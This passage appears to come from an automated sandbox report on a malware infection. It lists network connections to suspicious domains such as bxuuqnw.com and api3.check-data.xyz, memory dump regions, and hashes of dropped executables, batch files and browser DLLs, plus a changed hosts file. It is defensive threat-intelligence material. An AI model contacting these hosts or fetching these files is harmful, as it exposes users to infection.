| US | 8.8.8.8:53 | service-domain.xyz | udp |
| US | 3.80.150.121:443 | service-domain.xyz | tcp |
| US | 8.8.8.8:53 | 121.150.80.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.13.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.200.46:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| LT | 91.211.247.248:53 | bxuuqnw.com | udp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 216.58.201.97:443 | clients2.googleusercontent.com | tcp |
| TR | 195.16.74.230:80 | bxuuqnw.com | tcp |
| US | 8.8.8.8:53 | 46.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.247.211.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.74.16.195.in-addr.arpa | udp |
| GB | 142.250.200.46:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | api3.check-data.xyz | udp |
| US | 44.235.39.212:80 | api3.check-data.xyz | tcp |
| US | 8.8.8.8:53 | 212.39.235.44.in-addr.arpa | udp |
Files
memory/456-0-0x0000023D41140000-0x0000023D411A6000-memory.dmp
memory/456-1-0x00007FFD659E0000-0x00007FFD664A1000-memory.dmp
memory/456-2-0x0000023D5B710000-0x0000023D5B720000-memory.dmp
memory/456-3-0x0000023D5C080000-0x0000023D5C0DC000-memory.dmp
memory/652-4-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2496-5-0x00007FFD659E0000-0x00007FFD664A1000-memory.dmp
memory/2496-11-0x000002B7EB3E0000-0x000002B7EB402000-memory.dmp
memory/2496-12-0x000002B7EAED0000-0x000002B7EAEE0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dqmxqo3i.kko.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/652-17-0x0000000075360000-0x0000000075B10000-memory.dmp
memory/2496-18-0x000002B7EAED0000-0x000002B7EAEE0000-memory.dmp
memory/652-19-0x0000000002F20000-0x0000000002F30000-memory.dmp
memory/2496-22-0x00007FFD659E0000-0x00007FFD664A1000-memory.dmp
memory/456-23-0x00007FFD659E0000-0x00007FFD664A1000-memory.dmp
C:\Users\Admin\Pictures\PfWprLlupOSxC8b7ekM8atIx.exe
| MD5 | 5b423612b36cde7f2745455c5dd82577 |
| SHA1 | 0187c7c80743b44e9e0c193e993294e3b969cc3d |
| SHA256 | e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09 |
| SHA512 | c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c |
C:\Users\Admin\Pictures\IglGrnQY4KjxY4ESkNLr1P49.exe
| MD5 | 1a4bc801d6ed51e284e55b410b1e9ce3 |
| SHA1 | 60732e475643a20fe44f8ad44e04a2ffb1b14a74 |
| SHA256 | b02db5ef9ee712655f43052f4350ce7449026cafa57bd238c16f58bb1b01d192 |
| SHA512 | 262462bd590105d26faba7fc9a18110bbc2e414c4336a4beeaf32bfb06ad4c45ac2fec9e88c9d6ea5ef79b5926f513be1eb7e13dbed4e72fd498e6c5ec736720 |
C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe
| MD5 | 2c9c87660455858852c317c34878c3c2 |
| SHA1 | d0a4372e3c0e130f2abfc4c0bc98cedcc27ba5e7 |
| SHA256 | adb8cfd47704d4fb436c600570e580a9a102460b640d0b863e5015e1f879a6df |
| SHA512 | 5b9e664832cedb44b63f9208c77b0a16ae219c52d8babf37afc14eff7dc9bdd1cc87eeb4f34db55d423a15207cfa84960ff6819985da677c3180e7743c3b589c |
memory/3652-51-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-7K59T.tmp\IglGrnQY4KjxY4ESkNLr1P49.tmp
| MD5 | 33da9dc521f467c0405d3ef5377ce04b |
| SHA1 | 5249d7ce5dfabe5ee6d2fc7d3f3eba1e866b7d1f |
| SHA256 | dbab8a7b2b45fc7001d5e34d3d45ccbe93a7591f12910281acf2c32f8c4e631c |
| SHA512 | a3093637e1d731eab58080e10706db1afbf6e79fbac6593733b61033f97875ecbe230311e9741d349625ec3a66a6435318846d35290db8cd00af76d692699a55 |
C:\Users\Admin\AppData\Local\Temp\is-GVPS9.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
memory/2536-67-0x00000000006A0000-0x00000000006A1000-memory.dmp
C:\Users\Admin\Pictures\MjaQmNnsQNMq8m3PWjNhbwcJ.exe
| MD5 | 9fa95b17345d4e34558384c2ed84b444 |
| SHA1 | 4a89a40c9cae3dfc8d59d89cf50728fb44611725 |
| SHA256 | 13e62ced9672305c549138d2c5bc3142cce2731dbb2674ed9f4acfb9002f06fd |
| SHA512 | 018307efb7e63056ebb2df7a5edc15b7ce464e80179cdc85de83d955e57ca5cd83611641b8a49c82819b44301f91bd9f1631afb05f9f719f88ce7d34b787992c |
C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
| MD5 | 2dca1d0c0e9f892a717ed02f6e90211a |
| SHA1 | 5857f867c5fb4bedc25794c1f960b3c03dfabccf |
| SHA256 | b589fe21a9c02115d64fa8adab169804c69532eb2476132135a568afd179cefb |
| SHA512 | 2f84804935e96ba3ced308deaa1c5c8b991b4ab70551b192fbedee36b629b12780d338f84e2ed95e427eb4b93c6def9aa82d15f1d97add3fa8366b620463bd5d |
C:\Users\Admin\AppData\Local\Lina Text\linatext.exe
| MD5 | 0a2d5f96502140465c55815c136c107f |
| SHA1 | 521a872ae4fa52ec24b7f9e21bc580ef2796e491 |
| SHA256 | 5580b0ded28cd875604a99bcb1309c0474493524c21492be829e3da0eea8447c |
| SHA512 | f37a9bed2f431d0997b9d27d8e0c425c1b1ba27304fd1c01e15adda9ac93289c6293d8d7e3faadc8aef2ec874b470eb983a5f7964acaf0e3bfdfaea781725560 |
C:\Users\Admin\AppData\Local\Temp\nsk4604.tmp\INetC.dll
| MD5 | 2b342079303895c50af8040a91f30f71 |
| SHA1 | b11335e1cb8356d9c337cb89fe81d669a69de17e |
| SHA256 | 2d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f |
| SHA512 | 550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47 |
memory/1720-120-0x0000000000400000-0x00000000005AA000-memory.dmp
memory/1720-118-0x0000000000400000-0x00000000005AA000-memory.dmp
C:\Users\Admin\AppData\Local\Lina Text\linatext.exe
| MD5 | 7ae32340c855948c1e201cbc53b6182e |
| SHA1 | 482a29ea5d0dedea6adc295ae6cbb78905bd199c |
| SHA256 | 890b3b3d31090e102e0b917428f34550e55681ab845b7efef9e05d526eab0872 |
| SHA512 | 030a222f02853b64b4be615f623f46884a0aac0b000b51494dd80bbbe3adb4c2287284dbe1a58aaa3b52f09c83095a2fd8b4676788ad68b90fba7e23d7075b4e |
memory/3932-123-0x0000000000400000-0x00000000005AA000-memory.dmp
memory/3932-125-0x0000000000400000-0x00000000005AA000-memory.dmp
memory/384-127-0x0000000000800000-0x0000000000900000-memory.dmp
memory/384-128-0x0000000001F80000-0x0000000001F8B000-memory.dmp
memory/384-129-0x0000000000400000-0x000000000047E000-memory.dmp
memory/652-131-0x0000000075360000-0x0000000075B10000-memory.dmp
memory/3292-133-0x0000000002140000-0x0000000002167000-memory.dmp
memory/3292-132-0x00000000006D0000-0x00000000007D0000-memory.dmp
memory/3292-139-0x0000000000400000-0x000000000063B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
| MD5 | eee5ddcffbed16222cac0a1b4e2e466e |
| SHA1 | 28b40c88b8ea50b0782e2bcbb4cc0f411035f3d5 |
| SHA256 | 2a40e5dccc7526c4982334941c90f95374460e2a816e84e724e98c4d52ae8c54 |
| SHA512 | 8f88901f3ebd425818db09f268df19ccf8a755603f04e9481bcf02b112a84393f8a900ead77f8f971bfa33fd9fa5636b7494aaee864a0fb04e3273911a4216dc |
memory/5104-146-0x0000000000400000-0x000000000043D000-memory.dmp
memory/764-147-0x0000000000400000-0x0000000000930000-memory.dmp
memory/652-148-0x0000000002F20000-0x0000000002F30000-memory.dmp
memory/764-149-0x0000000000C00000-0x0000000000C01000-memory.dmp
C:\Users\Admin\AppData\Roaming\Temp\Task.bat
| MD5 | 11bb3db51f701d4e42d3287f71a6a43e |
| SHA1 | 63a4ee82223be6a62d04bdfe40ef8ba91ae49a86 |
| SHA256 | 6be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331 |
| SHA512 | 907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2 |
memory/3292-153-0x0000000061E00000-0x0000000061EF3000-memory.dmp
memory/3652-186-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\Pictures\HaHE4yGhKaVOdJY4tH9U0wE2.exe
| MD5 | 825441372bbba175c241a1cf4c798438 |
| SHA1 | 84c1e2f2a24b338666dc98b64b266335b7fae5e9 |
| SHA256 | c307873c80fd5892e04c45d29ccc3f0ad506f0e77d768f20426851434df2f933 |
| SHA512 | 08c009748b1e4167d933e4e8443dac4600a0b5d1281fbbb660a28fb26682d9d6da46f39f1640ee3ffa3bc5b3dd3ee87b400a9b007b98cffedbd75e360ec2ac18 |
memory/3512-204-0x00000000006F0000-0x0000000000706000-memory.dmp
memory/384-205-0x0000000000400000-0x000000000047E000-memory.dmp
memory/2536-214-0x00000000006A0000-0x00000000006A1000-memory.dmp
memory/2536-222-0x0000000000400000-0x00000000004B8000-memory.dmp
memory/3292-223-0x0000000000400000-0x000000000063B000-memory.dmp
C:\Users\Admin\Pictures\mqJpRwpbfK974CI6kSx5DDx3.exe
| MD5 | 3d233051324a244029b80824692b2ad4 |
| SHA1 | a053ebdacbd5db447c35df6c4c1686920593ef96 |
| SHA256 | fbd467ce72bca00eea3aaa6f32abc8aca1a734030d082458e21e1fe91e6a8d84 |
| SHA512 | 7f19c6400ac46556a9441844242b1acb0b2f11a47f5d51f6d092406a8c759a6d78c578bb5b15035e7cd1cdb3035acf0db884708b0da1a83eb652a50a68e3a949 |
memory/3932-234-0x0000000000400000-0x00000000005AA000-memory.dmp
C:\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
C:\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
memory/764-255-0x0000000000400000-0x0000000000930000-memory.dmp
C:\Users\Admin\Pictures\POWMHemIAdhWqbG9WwO5wEor.exe
| MD5 | edbbde4b537d39ba4c8d12c629fd692c |
| SHA1 | 676a6ef61724dac25961948f9af87d7c806f3835 |
| SHA256 | 008902a088c8605dcded8298ed0c0d1f12dbb78b06bf44bf734005c77c890ed8 |
| SHA512 | 550b5c429a292ba1086d0b11a1f317c09a7fc193b9b95d2e94fa620a837384e218b4788206c59b0234e2d1efe790880433fdefe182016c3885c981f4a86fca73 |
C:\Users\Admin\Pictures\POWMHemIAdhWqbG9WwO5wEor.exe
| MD5 | 78efd4aeb880dd8802040dddc113f271 |
| SHA1 | 41a0434db7d57fdc776a348b72a4108334652338 |
| SHA256 | bd9f4bb0d482665a4682b8f503c295b2f4804aaf3f91f529568b626cbd9d964b |
| SHA512 | de1d5b3bdb0948a6c1a93cdb634134472fd666ece7e8ed1e40d2267c10ef3342a3cf6bf3a3582a547201abb9c1643dc8a241f865cfe2d2875b2469b404136438 |
C:\Users\Admin\Pictures\POWMHemIAdhWqbG9WwO5wEor.exe
| MD5 | e02512a7f6b8efe39828c778b014f035 |
| SHA1 | 83519489be5305fda43e1d95cc55d8d802ccce6f |
| SHA256 | a14af5e12b155500e8e6b35f9df454494aa8c2d5f461a16a503e90feb2169344 |
| SHA512 | 3ad4ad341c262f90029717d9b55ccec23bf5c6c53efcbfd2acba0a8b492539bb26f0ed34e53097f87a890ebb37d3e71a214edf962dcefe7847990291240de51b |
C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe
| MD5 | 8fa0216e872fa81783c75b6f8d292f0f |
| SHA1 | c6c5c36f4cfed327ff5f7db61d7961051ac0d590 |
| SHA256 | 8136a9863428315ec06a5aecf0be74a9a6ffbfeeabc69eb088ee721ebb209903 |
| SHA512 | 83fcc8dd3d7cbf553444df862ccde0f50d68075af2139f981c2a7cf74ea5ede8f44758200dc12fa3a3aeef3d45a29af9bc385a9c187bc1d0a79f5e75f5774075 |
C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe
| MD5 | 3bb9d9646ee7d8da875007a53c1b11f1 |
| SHA1 | 3188bb0e36f41408bb05c056f71c0fbfcf90917b |
| SHA256 | 91de96fb4afdd47b1b453496c2c52beca3bad15b76846acbf3938891e19ad296 |
| SHA512 | 1307761a4e783f01cedb0ca98e8a8c16aaf36d46f460cd50186b987222965f672602008c729333a1a6bf44d802cc0752d6eecf8f9ba1c71c4cc0366aae90c89c |
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2403150201429814268.dll
| MD5 | accb0574d1b3d7fac9d5b5f85c7633b9 |
| SHA1 | 82712162696100596de312280cc1a23682fb846b |
| SHA256 | b37f77a459119a76bf5e51ca2e96dab212dc1c3ee8b600ca25f94d41e735ff0c |
| SHA512 | 97bb9c67427c1d95dc8a017b5b337d9012db6a67600c44477b68860025ca016eedcddae224b27be6e54e46d3d2a1ae5fe35c3bab8bf3d7be78d8e70d28ff1e2c |
memory/3932-286-0x0000000000400000-0x00000000005AA000-memory.dmp
memory/4268-290-0x0000000000660000-0x0000000000B98000-memory.dmp
memory/1720-296-0x0000000000660000-0x0000000000B98000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2403150201432001720.dll
| MD5 | 910b9592b184a31510e59305cb657ea8 |
| SHA1 | 596e0a8d094bce623db147fb878a7985c1e2d344 |
| SHA256 | 5a2f87012815c9176be68dc94d73c5fcfb985b7589170c8c2685cb5559648db9 |
| SHA512 | bac09b3ea9af0bd7e14b9434b4b0916cecd9352417a1a56de55f03dffb2a22eed5b14d62b33683e2b34a31bf8430e76e74ed256b1c98f7ff8bdec0928ea19f8f |
C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe
| MD5 | e6c68355c078515bc592a6628fe27df8 |
| SHA1 | 0a36dda4e027d305a89b53ec518268867e964c28 |
| SHA256 | 77d7fc4c80a48778aa22b34032284627258189a24f9b79c27e31450d792c0009 |
| SHA512 | a4ba81ae84db89be9c192cf00447cdd67d7a6cedca3ef27cc9eff849628c207e1b5f776b124d5e38a42706f9eb2a68e2ad9d4b4abfb21686a17b98cce869160d |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\UzSZFMWFpthvMvdZfvnxrxs2.exe
| MD5 | eca4a3b65888bae4bbb922aaac532bfe |
| SHA1 | 02906ea04dfdca0c11ef4e54659ccad5f32ccbc8 |
| SHA256 | 7c2daf7455713c45299a2ee7b95d10f710ad7b09f91f00ee693efda9e562e2b3 |
| SHA512 | 71d274ddc8452d1322f70041910d8aeb6eb3d5adc6b75090682ffd56af42fd819632afd28029aac75fd76e4cc62991a3a00c5bb1a715a31b36c662d72f69936e |
memory/3292-303-0x00000000006D0000-0x00000000007D0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Opera_installer_240315020143653856.dll
| MD5 | 8044657c7f04f53eaec26eabeb3a0ad4 |
| SHA1 | 6c1a438b835a1d601caf6eb5832ed49a73891a9d |
| SHA256 | d5220894bfd8e3a508cdbe85e8d7a11201b345d192dc6ade2e6955f4a9ee6a41 |
| SHA512 | 5a8609a4a92712d1bf632e5b95e228e1f3ac49ff4b21e84d01986da609458bf32632d4a48bff75a4292a95b0dd3e73f1808fb1513433a4dd09cb1df0b8adf0bd |
memory/3292-305-0x0000000000400000-0x000000000063B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Opera_installer_240315020143653856.dll
| MD5 | 4311094279d49b549ddeb2dfa119aaec |
| SHA1 | eae0f7c19b191232fe276af4cf5bded2fa58e9a7 |
| SHA256 | 70ed755820a17f15cc0d386ebd9d2472aeb0029f85e8d19814e373cf242e42fd |
| SHA512 | 358a6471f122c82682e0729c18a75bb1449c261a7d3690ddf4dadc86373be77ed8fb80564ba93221068add1842e9494c1761d55a1cf233210e6a235e8c8e0d87 |
memory/856-312-0x0000000000F60000-0x0000000001498000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS86E3.tmp\Install.exe
| MD5 | a6e57e29fd138dff4760875c9cc63dec |
| SHA1 | 90952d0e1931f9584ea39d68b1c4db7f938fad5d |
| SHA256 | 606c38e956d0fa5157f33e3e0a27fdfdc7cfb72e4cce0dd453023b222b482fa7 |
| SHA512 | 859872d6d3c32f734c72679730a11a5b08655f6b6d22338934149589e7ab50d9c2a78d65a9dbf35db58dea5b2117b4adb26d353aaae30101c4ed3a7900bd46cf |
C:\Users\Admin\AppData\Local\Temp\7zS86E3.tmp\Install.exe
| MD5 | c3fef69fc391191a4b7b30e21b60b740 |
| SHA1 | d140dab662bb9d0e8287f51c1252de2a17be3960 |
| SHA256 | db729e8fdb08e00bdb81212e39eb2f27ec33e61d6a6d8bb98384be997fa5eb8d |
| SHA512 | b4bbcdaad9e1ee188cb435893694ae3dd3f15c4e2f88c0b9253b3b2a4f8ddd9e07c200479216192b0681bf582f407b64f45ba86265362e712e089dc67e39aa69 |
C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe
| MD5 | 451017013c8fe931141602ad982091ef |
| SHA1 | 6a8fa36852417a03328e715e9982a1ff33e78890 |
| SHA256 | d22699d9c8b27b57905773f82d4a873df2aaa7d26724d88ee43e6eb005076eea |
| SHA512 | aed81f0a193e48dbc697a3b59444d111eefdc69dde70b2ec9ab4a5de821a0a4861c1d54df639b40bfb9da69b050a6ee3ed299c3329a83761764481fdc7bbcacf |
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2403150201440593128.dll
| MD5 | 40d5188f242312c828b009ba77e9bcb8 |
| SHA1 | 2cda395122f0510efc2abcc2aee6454efb6f3b92 |
| SHA256 | d81a531d1be9ed3623b9041186157dc20470692c6a0579728581d33a5e46b9cd |
| SHA512 | f29654ffa139409161a67adfe0e9ac197a3e436f7ef3f3c29b7a8f0cde21482cb01c5681efcb3c72d8d051b46eba1283db802d20a8573536a3d9c113a5e466c4 |
memory/3128-321-0x0000000000660000-0x0000000000B98000-memory.dmp
memory/856-313-0x0000000000F60000-0x0000000001498000-memory.dmp
memory/764-323-0x0000000000C00000-0x0000000000C01000-memory.dmp
C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe
| MD5 | 1a5ba32bf14b8d711b87fa4f501fa0e9 |
| SHA1 | 1f11fa1fded1d7d5997b07c94e6e617bb28ce77d |
| SHA256 | e18d907c483aacae1a031aa90d6a9b6c15e5ad4225b8cda661a233d26772fd17 |
| SHA512 | 63df4d931b6144c0157e1f72d26e63eb77c90647920c725a8ae51663afbed639582580f68fcf2765b8a7e907b23f288c3a6439c2569768686a5c5973c6aa2a5d |
memory/1872-327-0x0000000000660000-0x0000000000B98000-memory.dmp
C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat
| MD5 | 7b3c64ae39ca7ed6469dea416580a8c0 |
| SHA1 | d42d01dc0cd8088f48c9357b808aad51a1e1ad2a |
| SHA256 | cba8cf783b763221e30ef580be64bec770342794376648428c94e48ad261a3bc |
| SHA512 | a75591294fea7ec1e4d577833b764737c25beb2da11d70221096e3f84fd5c83de0875674c79a30a82057a3b878c31a185ade621c4a868c0c523cc8c3be4b8344 |
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2403150201444191872.dll
| MD5 | cd4e4cd6650ce4ff9364d3bceef86201 |
| SHA1 | f41be5f22b93a242737c255beb72549b4fde9d4d |
| SHA256 | 6168e0c56ae74148815683302dceec8ebc2d7e9d9edd766585220891bfee932f |
| SHA512 | 11d07d0edf5e39ccfde971522da0d53ec4d0f556e0a150ce17a27300256cb898b0b7f8dc25d4c839c8a7422d65a53012aff58e6eab4473edae0baaa8881d1807 |
C:\Users\Admin\AppData\Local\Temp\7zS8CBF.tmp\Install.exe
| MD5 | ca25394a90c074c74fd7b59f561372e4 |
| SHA1 | 01c1f8caac4ebc4c09d86e6b32eafedc84a25059 |
| SHA256 | 31e24fab1af31ac5e19a54c0662e6ea26b3aad91c043d3c489a16ea02a50cc7a |
| SHA512 | 98e866f51e371caddf58d75b0819a7b8beb99ffdca0aac9e8bec3b862dcfef4f864d9430845d219c7025f7879563451c5ad6375c2fe92e2819948fb34497d584 |
memory/4824-351-0x0000000010000000-0x00000000105E9000-memory.dmp
C:\ProgramData\Are.docx
| MD5 | a33e5b189842c5867f46566bdbf7a095 |
| SHA1 | e1c06359f6a76da90d19e8fd95e79c832edb3196 |
| SHA256 | 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454 |
| SHA512 | f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b |
memory/3292-361-0x0000000000400000-0x000000000063B000-memory.dmp
memory/3932-362-0x0000000000400000-0x00000000005AA000-memory.dmp
memory/764-363-0x0000000000400000-0x0000000000930000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/1428-365-0x00007FFD64580000-0x00007FFD65041000-memory.dmp
memory/1428-367-0x00000156EF6F0000-0x00000156EF700000-memory.dmp
memory/1428-366-0x00000156EF6F0000-0x00000156EF700000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2e907f77659a6601fcc408274894da2e |
| SHA1 | 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d |
| SHA256 | 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233 |
| SHA512 | 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721 |
memory/1428-380-0x00007FFD64580000-0x00007FFD65041000-memory.dmp
memory/236-389-0x00007FFD646A0000-0x00007FFD65161000-memory.dmp
memory/236-391-0x000002CBC73D0000-0x000002CBC73E0000-memory.dmp
memory/236-402-0x000002CBC73D0000-0x000002CBC73E0000-memory.dmp
memory/2472-405-0x000002BF1D1A0000-0x000002BF1D1B0000-memory.dmp
memory/2472-406-0x000002BF1D1A0000-0x000002BF1D1B0000-memory.dmp
memory/2472-404-0x00007FFD646A0000-0x00007FFD65161000-memory.dmp
memory/236-421-0x000002CBC7850000-0x000002CBC786C000-memory.dmp
memory/236-423-0x000002CBC7870000-0x000002CBC7925000-memory.dmp
memory/236-422-0x00007FF4546F0000-0x00007FF454700000-memory.dmp
memory/236-424-0x000002CBC73D0000-0x000002CBC73E0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 65a68df1062af34622552c4f644a5708 |
| SHA1 | 6f6ecf7b4b635abb0b132d95dac2759dc14b50af |
| SHA256 | 718dc2f5f4a6dbb7fab7f3db05bd7f602fb16526caae7084ab46c3ab4e7bad35 |
| SHA512 | 4e460eb566032942547b58411222dd26ae300a95f83cf5ae6df58ebd28594341123611b348bd4031a33bc7f38307d5cb8fb677bba8c896919e3eee677a104d4d |
memory/236-430-0x000002CBC75E0000-0x000002CBC75EA000-memory.dmp
memory/236-431-0x000002CBC7A70000-0x000002CBC7A8C000-memory.dmp
memory/236-432-0x000002CBC75F0000-0x000002CBC75FA000-memory.dmp
memory/236-437-0x000002CBC7AB0000-0x000002CBC7ACA000-memory.dmp
memory/236-438-0x000002CBC7600000-0x000002CBC7608000-memory.dmp
memory/236-439-0x000002CBC7A90000-0x000002CBC7A96000-memory.dmp
memory/236-440-0x000002CBC7AA0000-0x000002CBC7AAA000-memory.dmp
memory/3932-441-0x0000000000400000-0x00000000005AA000-memory.dmp
memory/2472-443-0x00007FFD646A0000-0x00007FFD65161000-memory.dmp
memory/236-442-0x000002CBC73D0000-0x000002CBC73E0000-memory.dmp
memory/236-446-0x00007FFD646A0000-0x00007FFD65161000-memory.dmp
C:\Windows\system32\drivers\etc\hosts
| MD5 | 00930b40cba79465b7a38ed0449d1449 |
| SHA1 | 4b25a89ee28b20ba162f23772ddaf017669092a5 |
| SHA256 | eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01 |
| SHA512 | cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62 |
memory/3740-452-0x0000000140000000-0x000000014000E000-memory.dmp
memory/3740-453-0x0000000140000000-0x000000014000E000-memory.dmp
memory/3740-456-0x0000000140000000-0x000000014000E000-memory.dmp
memory/3740-457-0x0000000140000000-0x000000014000E000-memory.dmp
memory/3740-460-0x0000000140000000-0x000000014000E000-memory.dmp
memory/5072-462-0x0000000140000000-0x0000000140848000-memory.dmp
memory/5072-461-0x0000000140000000-0x0000000140848000-memory.dmp
memory/5072-463-0x0000000140000000-0x0000000140848000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\C3AE.bat
| MD5 | 55cc761bf3429324e5a0095cab002113 |
| SHA1 | 2cc1ef4542a4e92d4158ab3978425d517fafd16d |
| SHA256 | d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a |
| SHA512 | 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155 |
memory/5072-464-0x0000000140000000-0x0000000140848000-memory.dmp
memory/3740-454-0x0000000140000000-0x000000014000E000-memory.dmp
memory/5072-465-0x0000000140000000-0x0000000140848000-memory.dmp
memory/5072-466-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1376-482-0x00000000005C0000-0x00000000005DE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\GDGIJECGDG.exe
| MD5 | 42b838cf8bdf67400525e128d917f6e0 |
| SHA1 | a578f6faec738912dba8c41e7abe1502c46d0cae |
| SHA256 | 0e4ffba62ce9a464aa1b7ff9f1e55ace8f51ff1e15102d856f801a81f8b4607d |
| SHA512 | f64b39d885375251ab7db72c57dc5b5095f0c6412169f1035d1f6a25b8415a2a01004d06bfa0267cf683ef7dea7a9f969ad43fde5a4376f1fcb65a57403433c0 |
memory/3292-487-0x0000000000400000-0x000000000063B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\757987694264
| MD5 | e713d3899bc2b5f1889ad6e3eab0d40c |
| SHA1 | dc3f735cf6452be41a247b31b57d46e251bd84da |
| SHA256 | 802ec6b99b93186f77b6f3079883351cf9b0129b74e6e2a70496efc3785b71a9 |
| SHA512 | fc5422bbfb47ef7ed04edb5b60ee47d47ab06cdebb9b3f526b6d628d4b2da5fcca2ab3c894eeea90a252b9809f19d15fdf02f34b6e60e71d1d98c1fb873277ed |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\opera_package
| MD5 | 33a1ec3984685638093bfec370960c62 |
